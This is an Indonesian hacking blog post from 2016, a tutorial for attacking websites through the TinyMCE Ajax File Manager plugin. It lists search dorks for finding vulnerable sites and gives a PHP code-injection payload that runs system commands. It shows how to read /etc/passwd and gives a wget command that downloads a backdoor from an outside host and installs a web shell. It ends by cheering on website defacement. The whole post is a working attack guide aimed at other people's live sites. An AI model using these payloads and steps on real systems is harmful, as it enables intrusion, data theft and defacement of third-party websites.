Wednesday, 20 April 2016

Exploit TinyMCE Ajax File Manager Remote Code Execution


Hello World; ,Malam fans, please say hello haters ^^
Nuenomaru disini .-.
Kalii iniii Nue bakal bahas dan share Tutorial Exploit TinyMCE Ajax File Manager Remote Code Execution 
*ini exploit lama sih , iseng2 share kali aja masih crotz
Download Hackbar Disini
Langsung intip tutorialnya ;*


Dork: 
inurl:"/plugins/filemanager/" 
inurl:'/timynce/plugins/"
(Sisanya kembangin lg, gunakan imajinasi bokevers elo, biar dpt yg vuln and verawan)

1. Dorking dengan searchengine, lalu pilih web target yg mau di tusbo'ol

2. Masukin Exploit plugins ajaxfilemanager: /[path]/tinymce/plugins/ajaxfilemanager/
Kurang lebih bakal begini tampilannya:





3. Lalu Klik file atau tambahkan: /ajax_create_folder.php pada link target..

akan muncul pesan seperti diatas ^^

4. Langsung keluarin senjata kita *yupz Hackbar
ceklis Enable Post Data, lalu masukan Exploitnya , lalu Klik Execute..
Exploit: 
foo=<?php error_reporting(0);print(system('nuen00b'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

nuen00b ganti dengan command/perintah yang mau agan gunakan. 
contoh: ls (berguna utk menampilkan isi dir)


jika sudah klik Execute
lalu buka tab baru lagi, masukan link target tadi, tambahkan:/inc/data.php
contoh: /[path]/tinymce/plugins/ajaxfilemanager/inc/data.php
Nanti akan muncul isi dirnya:



jika nuen00b Di ubah menjadi cat /etc/passwd lalu excute dan periksa di /[path]/tinymce/plugins/ajaxfilemanager/inc/data.php
(cat itu berguna utk menampilkan text, dan /etc/passwd itu bisa dibilang kita ingin menampilkan semua text yg berhubungan dengan password *maapklosalah))

akan muncul data seperti dibawah:



awkakw pokoknya ya namanya Remode Code Execution, itu pinter2 gunain Command aja bang :) , baca2 command linux deh gan awkawk..
btw karna disini kita mau Upload Backdoor, ya berarti kita gunain fungsi Command "wget"
(Wget adalah download manager melalui terminal atau no-Gui)

contoh: wget http://linktempatnyimpenbackdoor.crotz/namafile.txt -O namabackdoorygbakaldibuat.php 
Lalu Klik Execute lagi, 


buka deh link tadi:
/[path]/tinymce/plugins/ajaxfilemanager/inc/namashellygtadidiexcute.php



Pintu Belakang *eh Backdoor sudah terpasang, waktunya Upload Shell ente.
dan BooM, Shell ku trtanam :*

gimana mau PHP, aku aja masih belajar HTML awkawk

Kalo Shell dah dipasang mau diapain ??
ya seterah agan deh, kalo bisa nitip file , report bug ke admin/bantu Patch.
kalo mau tebas index.php, Back Up yak :* *hargai karya webmaster*
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Website Defaced~
Sekian dan semoga bermanfaat .. terimakasih


Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
Lanjoott carii gawe akwkaw, waktunya jemput masadepan :* , bkn nungguin masadepan :'D


Source and Thanks to: Packet Storm | nonton video Youtube
Thanks to Live Targetnya kak Unnamed48




./Nuenomaru



















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


EmoticonEmoticon